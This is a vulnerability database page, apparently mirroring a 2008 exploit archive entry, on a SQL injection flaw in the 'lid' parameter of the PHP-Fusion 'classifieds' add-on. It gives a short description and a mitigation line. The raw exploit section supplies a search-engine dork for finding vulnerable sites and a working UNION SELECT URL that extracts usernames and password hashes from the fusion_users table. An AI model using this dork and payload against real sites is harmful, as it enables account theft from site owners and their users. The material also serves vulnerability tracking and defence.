header-logo
Suggest Exploit
vendor:
classifieds
by:
boom3rang
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Php fusion “classifieds” SQL-injetion

A remote SQL injection vulnerability exists in Php fusion classifieds. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'lid' parameter in the 'classifieds.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL queries to the vulnerable script. This can result in the execution of arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries that can be executed in the back-end database.
Source

Exploit-DB raw data:

#################################
Php fusion "classifieds"  SQL-injetion  
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
contact     :    boomerang [at] knaqu-shqipe [dot] de
webpage  :  www.khg-crew.ws 
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania = 
##########################################

# milw0rm.com [2008-06-27]

Navigation

Suggest Exploit

Services By CQR